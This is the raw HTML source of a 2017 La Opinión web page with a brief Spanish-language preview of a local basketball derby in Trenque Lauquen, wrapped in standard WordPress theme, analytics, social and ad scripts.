<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="es-ES"> <!--<![endif]-->
<head>
    <title>Se juega el clásico | La Opinión</title>
    <meta charset="UTF-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="pingback" href="http://laopinion.com.ar/xmlrpc.php" />
    <meta property="og:image" content="http://laopinion.com.ar/wp-content/uploads/2017/08/basquet3.jpeg" /><meta name="author" content="La Opinion">
<link rel="alternate" type="application/rss+xml" title="La Opinión &raquo; Feed" href="http://laopinion.com.ar/feed/" />
<link rel="alternate" type="application/rss+xml" title="La Opinión &raquo; RSS de los comentarios" href="http://laopinion.com.ar/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="La Opinión &raquo; Se juega el clásico RSS de los comentarios" href="http://laopinion.com.ar/se-juega-el-clasico/feed/" />
<link rel='stylesheet' id='tiempocom_style-css'  href='http://laopinion.com.ar/wp-content/plugins/tiempocom/static/css/default.css?ver=ece71427dfbf95750ada9d289483f5f5' type='text/css' media='all' />
<link rel='stylesheet' id='google_font_open_sans-css'  href='http://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C400%2C600%2C700&#038;ver=ece71427dfbf95750ada9d289483f5f5' type='text/css' media='all' />
<link rel='stylesheet' id='google_font_roboto-css'  href='http://fonts.googleapis.com/css?family=Roboto%3A500%2C400italic%2C700%2C500italic%2C400&#038;ver=ece71427dfbf95750ada9d289483f5f5' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_front-css'  href='http://laopinion.com.ar/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.12.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='http://laopinion.com.ar/wp-content/themes/Newspaper/style.css?ver=6.2' type='text/css' media='all' />
<script type='text/javascript' src='http://laopinion.com.ar/wp-includes/js/jquery/jquery.js?ver=1.11.1'></script>
<script type='text/javascript' src='http://laopinion.com.ar/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://laopinion.com.ar/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://laopinion.com.ar/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='En Pigüé se lanza la definición del  TC del Sudoeste' href='http://laopinion.com.ar/en-pigue-se-lanza-la-definicion-del-tc-del-sudoeste/' />
<link rel='next' title='Nazareno García contó el paso por el Mundial' href='http://laopinion.com.ar/nazareno-garcia-conto-el-paso-por-el-mundial/' />

<link rel='canonical' href='http://laopinion.com.ar/se-juega-el-clasico/' />
<link rel='shortlink' href='http://laopinion.com.ar/?p=51236' />
<meta property="fb:app_id" content="305796219513705"/><script type="text/javascript">
(function(url){
	if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }
	var addEvent = function(evt, handler) {
		if (window.addEventListener) {
			document.addEventListener(evt, handler, false);
		} else if (window.attachEvent) {
			document.attachEvent('on' + evt, handler);
		}
	};
	var removeEvent = function(evt, handler) {
		if (window.removeEventListener) {
			document.removeEventListener(evt, handler, false);
		} else if (window.detachEvent) {
			document.detachEvent('on' + evt, handler);
		}
	};
	var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');
	var logHuman = function() {
		var wfscr = document.createElement('script');
		wfscr.type = 'text/javascript';
		wfscr.async = true;
		wfscr.src = url + '&r=' + Math.random();
		(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
		for (var i = 0; i < evts.length; i++) {
			removeEvent(evts[i], logHuman);
		}
	};
	for (var i = 0; i < evts.length; i++) {
		addEvent(evts[i], logHuman);
	}
})('//laopinion.com.ar/?wordfence_logHuman=1&hid=2CD87FA2133586B29AB949199D1F1100');
</script><!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://laopinion.com.ar/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><!--[if IE  8]><link rel="stylesheet" type="text/css" href="http://laopinion.com.ar/wp-content/plugins/js_composer/assets/css/vc-ie8.min.css" media="screen"><![endif]-->
<!-- JS generated by theme -->

<script>
    

var td_blocks = []; //here we store all the items for the current page

//td_block class - each ajax block uses a object of this class for requests
function td_block() {
    this.id = '';
    this.block_type = 1; //block type id (1-234 etc)
    this.atts = '';
    this.td_column_number = '';
    this.td_current_page = 1; //
    this.post_count = 0; //from wp
    this.found_posts = 0; //from wp
    this.max_num_pages = 0; //from wp
    this.td_filter_value = ''; //current live filter value
    this.td_filter_ui_uid = ''; //used to select a item from the drop down filter
    this.is_ajax_running = false;
    this.td_user_action = ''; // load more or infinite loader (used by the animation)
    this.header_color = '';
    this.ajax_pagination_infinite_stop = ''; //show load more at page x
}

    
    
        // td_js_generator - mini detector
        (function(){
            var html_tag = document.getElementsByTagName("html")[0];

            if(navigator.userAgent.indexOf("MSIE 10.0") > -1) {
                html_tag.className+=' ie10';
            }

            if(!!navigator.userAgent.match(/Trident.*rv\:11\./)) {
                html_tag.className+=' ie11';
            }

            if (/(iPad|iPhone|iPod)/g.test( navigator.userAgent )) {
                html_tag.className+=' td-md-is-ios';
            }

            var user_agent = navigator.userAgent.toLowerCase();
            if(user_agent.indexOf("android") > -1) {
                html_tag.className+=' td-md-is-android';
            }

            if (navigator.userAgent.indexOf('Mac OS X') != -1) {
                html_tag.className+=' td-md-is-os-x';
            }

            if(/chrom(e|ium)/.test(navigator.userAgent.toLowerCase())) {
               html_tag.className+=' td-md-is-chrome';
            }

            if (navigator.userAgent.indexOf('Firefox') != -1) {
                html_tag.className+=' td-md-is-firefox';
            }

            if (navigator.userAgent.indexOf('Safari') != -1 && navigator.userAgent.indexOf('Chrome') == -1) {
                html_tag.className+=' td-md-is-safari';
            }

        })();
    
    
var td_viewport_interval_list=[{"limit_bottom":767,"sidebar_width":228},{"limit_bottom":1018,"sidebar_width":300},{"limit_bottom":1140,"sidebar_width":324}];
var td_animation_stack_effect="type0";
var tds_animation_stack=true;
var td_animation_stack_specific_selectors=".entry-thumb, img";
var td_animation_stack_general_selectors=".td-animation-stack img, .post img";
var td_ajax_url="http:\/\/laopinion.com.ar\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=6.2";
var td_get_template_directory_uri="http:\/\/laopinion.com.ar\/wp-content\/themes\/Newspaper";
var tds_snap_menu="";
var tds_logo_on_sticky="";
var tds_header_style="";
var td_please_wait="Por favor espera...";
var td_email_user_pass_incorrect="Usuario o contrase\u00f1a incorrecta!";
var td_email_user_incorrect="Correo electr\u00f3nico o nombre de usuario incorrecto!";
var td_email_incorrect="Correo electr\u00f3nico incorrecto!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top=0;
var tds_theme_color_site_wide="#4686cc";
var tds_smart_sidebar="";
var td_theme_v="Ni4y";
var td_theme_n="TmV3c3BhcGVy";
var td_magnific_popup_translation_tPrev="Anterior (tecla de flecha izquierda)";
var td_magnific_popup_translation_tNext="Siguiente (tecla de flecha derecha)";
var td_magnific_popup_translation_tCounter="%curr% de %total%";
var td_magnific_popup_translation_ajax_tError="El contenido de %url% no pudo cargarse.";
var td_magnific_popup_translation_image_tError="La imagen #%curr% no pudo cargarse.";
var td_ad_background_click_link="";
var td_ad_background_click_target="";
</script>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-9814895-1', 'auto');
  ga('send', 'pageview');

</script><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.2";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
</head>


<body class="single single-post postid-51236 single-format-standard se-juega-el-clasico white-menu wpb-js-composer js-comp-ver-4.12.1 vc_responsive td-animation-stack-type0 td-boxed-layout" itemscope="itemscope" itemtype="http://schema.org/WebPage">


<div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>

<div id="td-outer-wrap">

    <div class="td-transition-content-and-menu td-mobile-nav-wrap">
        <div id="td-mobile-nav">
    <!-- mobile menu close -->
    <div class="td-mobile-close">
        <a href="#">Cerrar</a>
        <div class="td-nav-triangle"></div>
    </div>

    <div class="td-mobile-content">
        <div class="menu-principal-container"><ul id="menu-principal" class=""><li id="menu-item-49888" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first menu-item-49888"><a href="http://laopinion.com.ar/">Inicio</a></li>
<li id="menu-item-12414" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-12414"><a>Noticias</a>
<ul class="sub-menu">
	<li id="menu-item-10426" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-10426"><a href="http://laopinion.com.ar/category/informacion-general/">Información General</a></li>
	<li id="menu-item-10428" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-10428"><a href="http://laopinion.com.ar/category/deportes/">Deportes</a></li>
	<li id="menu-item-10427" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-10427"><a href="http://laopinion.com.ar/category/editoriales/">Editoriales</a></li>
	<li id="menu-item-12073" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-12073"><a href="http://laopinion.com.ar/category/sociales/">Sociales</a></li>
	<li id="menu-item-12074" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-12074"><a href="http://laopinion.com.ar/category/linea-abierta/">Línea Abierta</a></li>
	<li id="menu-item-32873" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-32873"><a href="http://laopinion.com.ar/category/edicion-impresa/">Edición Impresa</a></li>
	<li id="menu-item-49897" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-49897"><a href="http://laopinion.com.ar/necrologicas/">Necrológicas</a></li>
</ul>
</li>
<li id="menu-item-12419" class="menu-item menu-item-type-post_type menu-item-object-grp_pages menu-item-12419"><a href="http://laopinion.com.ar/landing/omega/">Radio Omega</a></li>
<li id="menu-item-49896" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-49896"><a href="http://laopinion.com.ar/contacto/">Contacto</a></li>
</ul></div>    </div>
</div>    </div>

        <div class="td-transition-content-and-menu td-content-wrap">



<!--
Header style 1
-->

<div class="td-header-wrap td-header-style-1">

    <div class="td-header-top-menu-full">
        <div class="td-container td-header-row td-header-top-menu">
                    </div>
    </div>

    <div class="td-banner-wrap-full td-logo-wrap-full">
        <div class="td-container td-header-row td-header-header">
            <div class="td-header-sp-logo">
                        <a itemprop="url" href="http://laopinion.com.ar/"><img src="http://laopinion.com.ar/wp-content/uploads/2016/06/logo-1.png" alt=""/></a>
        <meta itemprop="name" content="La Opinión">
                </div>
			<div class="social">
            <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Documento sin t&iacute;tulo</title>
</head>

<body>
<a href="https://www.facebook.com/diariolaopinion" target="_blank"><img src="http://laopinion.com.ar/facebook.png" width="20" height="20" border="0" /></a>
<a href="https://plus.google.com/u/0/114382830919295015490/posts" target="_blank"><img src="http://laopinion.com.ar/google-plus.png" width="20" height="20" border="0" /></a>
<br />
<a href="https://twitter.com/laopinionweb" target="_blank"><img src="http://laopinion.com.ar/twitter.png" width="20" height="20" border="0" /></a>
<a href="https://www.youtube.com/user/diariolaopinion" target="_blank"><img src="http://laopinion.com.ar/youtube.png" width="20" height="20" border="0" /></a>
</body>
</html>
                                              
            </div> 
            <div class="clima">
            <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Weather Widget</title>
<style type="text/css">
/* CSS goes here */
#wxWrap {
    width: 230px;
    background: none; /* Old browsers */
    background: none; /* FF3.6+ */
    background: none; /* Chrome,Safari4+ */
    background: none; /* Chrome10+,Safari5.1+ */
    background: none; /* Opera11.10+ */
    background: none; /* IE10+ */
    filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#f0f0f0', endColorstr='#e0e0e0',GradientType=0 ); /* IE6-9 */
    background: none; /* W3C */
    padding: 2px 13px 2px 11px;
    -webkit-border-radius: 4px;
    -moz-border-radius: 4px;
    border-radius: 4px;
	font: 12px Arial,Verdana,sans-serif;
    color: #ffffff;
}
#wxIntro {
    display: inline-block;
    font: 12px Arial,Verdana,sans-serif;
    color: #ffffff;
    vertical-align: top;
    padding-top: 0px;
}
#wxmas {
    display: inline-block;
    font: 10px Arial,Verdana,sans-serif;
    font-color: #ffffff;
    vertical-align: top;
    padding-top: 8px;
    margin-right: 15px;
	text-transform:uppercase;
}
#wxmas1 a:link{
    display: inline-block;
    font: 10px Arial,Verdana,sans-serif;
    color: #ffffff;
    vertical-align: top;
    padding-top: 8px;
    margin-right: 15px;
	text-transform:uppercase;
}
#wxmas1 a:visited{
    display: inline-block;
    font: 10px Arial,Verdana,sans-serif;
    color: #ffffff;
    vertical-align: top;
    padding-top: 8px;
    margin-right: 15px;
	text-transform:uppercase;
}

#wxIcon {
    display: inline-block;
    width: 25px;
    height: 25px;
    margin: 2px 0 -1px 1px;
    overflow: hidden;
    background: url('http://l.yimg.com/a/lib/ywc/img/wicons.png') no-repeat 61px 0;
}
#wxIcon2 {
    display: inline-block;
    width: 30px;
    height: 30px;
    margin: 0px 0px 0 5px;
    overflow: hidden;
}
#wxTemp {
    display: inline-block;
    font: 13px Arial,Verdana,sans-serif;
	font-weight:bold;
    color: #ffffff;
    vertical-align: top;
    padding-top: 5px;
    margin-left: 0;
}
</style>

</head>

<body>

<div id="wxWrap">
  <span id="wxIntro1">
        Ahora en Trenque Lauquen
  </span>
    
</div>
<span id="wxIcon2"></span>
<span id="wxTemp"></span>
<span id="wxmas1">
        <a href="/pronostico-del-tiempo" target="_self"> Pron&oacute;stico</a>
		</span>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>
<script type="text/javascript">
// javascript will go here
$(function(){

    // Specify the ZIP/location code and units (f or c)
    var loc = 'ARBA0103'; // or e.g. SPXX0050
    var u = 'c';

    var query = "SELECT item.condition FROM weather.forecast WHERE location='" + loc + "' AND u='" + u + "'";
    var cacheBuster = Math.floor((new Date().getTime()) / 1200 / 1000);
    var url = 'http://query.yahooapis.com/v1/public/yql?q=' + encodeURIComponent(query) + '&format=json&_nocache=' + cacheBuster;

    window['wxCallback'] = function(data) {
        var info = data.query.results.channel.item.condition;
        $('#wxIcon').css({
            backgroundPosition: '-' + (61 * info.code) + 'px 0'
        }).attr({
            title: info.text
        });
        $('#wxIcon2').append('<img src="http://l.yimg.com/a/i/us/we/52/' + info.code + '.gif" width="34" height="34" title="' + info.text + '" />');
        $('#wxTemp').html(info.temp + '&deg;' + (u.toUpperCase()));
    };

    $.ajax({
        url: url,
        dataType: 'jsonp',
        cache: true,
        jsonpCallback: 'wxCallback'
    });
    
});
</script>
</body>
</html>
                                              
            </div> 
			<div class="fecha">
            <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Documento sin t&iacute;tulo</title>
</head>

<body>
<div class="suscripcion">
<a href="http://www.suscripcion.laopinion.com.ar/" target="_blank">Suscr&igrave;base</a>&nbsp;<a href="http://www.suscripcion.laopinion.com.ar/acceder-2/" target="_blank">Ingresar</a><br /></div>
<div class="dia">
S&aacute;bado 19 de
 Agosto de 2017</div>
</body>
</html>
                                              
            </div> 
        </div>
    </div>

    <div class="td-header-menu-wrap-full">
        <div class="td-header-menu-wrap td-header-gradient">
            <div class="td-container td-header-row td-header-main-menu">
                <div id="td-header-menu" role="navigation" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement">
    <div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo">
        			<a itemprop="url" href="http://laopinion.com.ar/"><img src="http://laopinion.com.ar/wp-content/uploads/2015/07/logoblancomovil2.png" alt=""/></a>
			<meta itemprop="name" content="La Opinión">
		    </div>
    <div class="menu-principal-container"><ul id="menu-principal-1" class="sf-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-49888"><a href="http://laopinion.com.ar/">Inicio</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children td-menu-item td-normal-menu menu-item-12414"><a>Noticias</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-10426"><a href="http://laopinion.com.ar/category/informacion-general/">Información General</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-normal-menu menu-item-10428"><a href="http://laopinion.com.ar/category/deportes/">Deportes</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-10427"><a href="http://laopinion.com.ar/category/editoriales/">Editoriales</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-12073"><a href="http://laopinion.com.ar/category/sociales/">Sociales</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-12074"><a href="http://laopinion.com.ar/category/linea-abierta/">Línea Abierta</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-32873"><a href="http://laopinion.com.ar/category/edicion-impresa/">Edición Impresa</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-49897"><a href="http://laopinion.com.ar/necrologicas/">Necrológicas</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-grp_pages td-menu-item td-normal-menu menu-item-12419"><a href="http://laopinion.com.ar/landing/omega/">Radio Omega</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-49896"><a href="http://laopinion.com.ar/contacto/">Contacto</a></li>
</ul></div></div>


<div class="td-search-wrapper">
    <div id="td-top-search">
        <!-- Search -->
        <div class="header-search-wrap">
            <div class="dropdown header-search">
			 <div class="buscar">
                <div class="vc_wp_search wpb_content_element"><div class="widget widget_search"><form role="search" method="get" class="td-search-form-widget" action="http://laopinion.com.ar/">
    <div>
        <input class="td-widget-search-input" type="text" value="" name="s" id="s" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="searchsubmit" value="Buscar" />
    </div>
</form></div></div>				</div>
            </div>
        </div>
    </div>
</div>

<div class="header-search-wrap">
	<div class="dropdown header-search">
		<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
			<form role="search" method="get" class="td-search-form" action="http://laopinion.com.ar/">
				<div class="td-head-form-search-wrap">
					<input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Buscar" />
				</div>
			</form>
			<div id="td-aj-search"></div>
		</div>
	</div>
</div>            </div>
        </div>
    </div>

</div><div class="td-main-content-wrap">

    <div class="td-container td-post-template-default ">
        <div class="td-crumb-container"></div>

        <div class="td-pb-row">
                                    <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                
    <article id="post-51236" class="post-51236 post type-post status-publish format-standard has-post-thumbnail hentry category-deportes" itemscope itemtype="http://schema.org/Article">
        <div class="td-post-header">

            
            <header class="td-post-title">
			

                <h1 itemprop="name" class="entry-title">Se juega el clásico</h1>               <div class="copete">
               El décimotercer capítulo del Torneo Apertura de la Asociación Básquetbol Trenque Lauquen (ABTL) se juega esta noche con el clásico en la ciudad. A las 21:30 se verán las caras el Foot Ball Club Argentino y Ferro Carril Oeste en cancha del “Decano”. 
			   </div>
            
                


                <div class="td-module-meta-info"> 
				
                                        <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-08-18T12:21:47+00:00" >18/08/2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                    <div class="td-post-comments"><a href="http://laopinion.com.ar/se-juega-el-clasico/#comments"><i class="td-icon-comments"></i>0</a></div>                                    </div>

            </header>

        </div>

        <div class="td-post-sharing td-post-sharing-top td-with-like">
				<div class="td-default-sharing">
		            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Flaopinion.com.ar%2Fse-juega-el-clasico%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Facebook</div></a>
		            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Se+juega+el+cl%C3%A1sico&url=http%3A%2F%2Flaopinion.com.ar%2Fse-juega-el-clasico%2F&via=laopinionweb"  ><i class="td-icon-twitter"></i><div class="td-social-but-text">Twitter</div></a>
		            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://laopinion.com.ar/se-juega-el-clasico/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
		            <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=http://laopinion.com.ar/se-juega-el-clasico/&amp;media=http://laopinion.com.ar/wp-content/uploads/2017/08/basquet3.jpeg" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
	            </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="http://www.facebook.com/plugins/like.php?href=http://laopinion.com.ar/se-juega-el-clasico/&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="http://laopinion.com.ar/se-juega-el-clasico/" data-text="Se juega el clásico" data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div>

        <div class="td-post-content">

        <div class="td-post-featured-image"><a href="http://laopinion.com.ar/wp-content/uploads/2017/08/basquet3.jpeg" data-caption=""><img width="696" height="464" itemprop="image" class="entry-thumb td-modal-image" src="http://laopinion.com.ar/wp-content/uploads/2017/08/basquet3-696x464.jpeg" alt="" title="basquet"/></a></div>
        <p>Un partido especial ya que es Argentino el único que tiene serias necesidades de ganar para seguir con chances de llegar a los play off. Ferro solo buscará un triunfo que renueven los ánimos en un equipo que ha sufrido varias derrotas.<br />
El puntero, Deportivo Argentino de Pehuajó y Atlético Ameghino se medirán, también a las 21:30. El “Naranja” buscará la clasificación con un triunfo que lo ponga en esa situación. Los pehuajenses ya están clasificados para la instancia siguiente y su interés estará en no perder terreno para asegurar el número uno de la fase regular.<br />
Ante la baja de San Martín, Jorge Newbery ganará los puntos de su presentación y tendrá fecha libre el Club Atlético Villegas. </p>
<div id="wpdevar_comment_1" style="width:100%;text-align:left;">
		<span style="padding: 10px;font-size:14px;font-family:Arial,Helvetica Neue,Helvetica,sans-serif;color:#031d58;">Comentá a través de Facebook</span>
		<div class="fb-comments" data-href="http://laopinion.com.ar/se-juega-el-clasico/" data-order-by="social" data-numposts="8" data-width="100%" style="display:block;"></div></div>
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-content_bottom">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-9856534548609209" data-ad-slot="9099033096"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-9856534548609209" data-ad-slot="9099033096"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-9856534548609209" data-ad-slot="9099033096"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-9856534548609209" data-ad-slot="9099033096"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

        </div>


        <footer>
                        
            <div class="td-post-source-tags">
                                            </div>

                                    <div class="td-author-name vcard author" style="display: none"><span class="fn"><a href="http://laopinion.com.ar/author/">La Opinion</a></span></div>	        <meta itemprop="author" content = "La Opinion"><meta itemprop="interactionCount" content="UserComments:0"/>        </footer>

    </article> <!-- /.post -->

    
                        <div class="comments" id="comments">
                            
	                            <div class="td-comments-title-wrap">
		                            		                            <h4 class="block-title"><span>Comentar</span></h4>
	                            </div>

	                            
	                        
                            								<div id="respond" class="comment-respond">
				<h3 id="reply-title" class="comment-reply-title">Responder <small><a rel="nofollow" id="cancel-comment-reply-link" href="/se-juega-el-clasico/#respond" style="display:none;">Cancelar respuesta</a></small></h3>
									<form action="http://laopinion.com.ar/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate>
																										<p class="comment-form-input-wrap">
            <span class="comment-req-wrap"><input class="" id="author" name="author" placeholder="Nombre:" type="text" value="" size="30" /></span></p>
<p class="comment-form-input-wrap">
            <span class="comment-req-wrap"><input class="" id="email" name="email" placeholder="Correo electrónico:" type="text" value="" size="30" /></span></p>
<p class="comment-form-input-wrap">
            <input class="" id="url" name="url" placeholder="Sitio web:" type="text" value="" size="30" /></p>
												<div class="clearfix"></div><p class="comment-form-input-wrap"><textarea placeholder="Comentario:" id="comment" name="comment" cols="45" rows="8" aria-required="true"></textarea></p>												<p class="form-submit">
							<input name="submit" type="submit" id="submit" class="submit" value="Publicar comentario" />
							<input type='hidden' name='comment_post_ID' value='51236' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
						</p>
						<p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="ff7188ca94" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="224"/></p>					</form>
							</div><!-- #respond -->
			                                                    </div> <!-- /.content -->


                            </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                <aside class="widget widget_text">			<div class="textwidget"><div><div class="dfad dfad_pos_1 dfad_first" id="_ad_13749"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- 300x250, creado 29/04/11 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:250px"
     data-ad-client="ca-pub-9856534548609209"
     data-ad-slot="2552290878"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div><div class="dfad dfad_pos_2" id="_ad_33818"><script type='text/javascript'>
  var googletag = googletag || {};
  googletag.cmd = googletag.cmd || [];
  (function() {
    var gads = document.createElement('script');
    gads.async = true;
    gads.type = 'text/javascript';
    var useSSL = 'https:' == document.location.protocol;
    gads.src = (useSSL ? 'https:' : 'http:') +
      '//www.googletagservices.com/tag/js/gpt.js';
    var node = document.getElementsByTagName('script')[0];
    node.parentNode.insertBefore(gads, node);
  })();
</script>

<script type='text/javascript'>
  googletag.cmd.push(function() {
    googletag.defineSlot('/87298799/www.laopinion.com.ar', [300, 250], 'div-gpt-ad-1466598948451-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>


<!-- /87298799/www.laopinion.com.ar -->
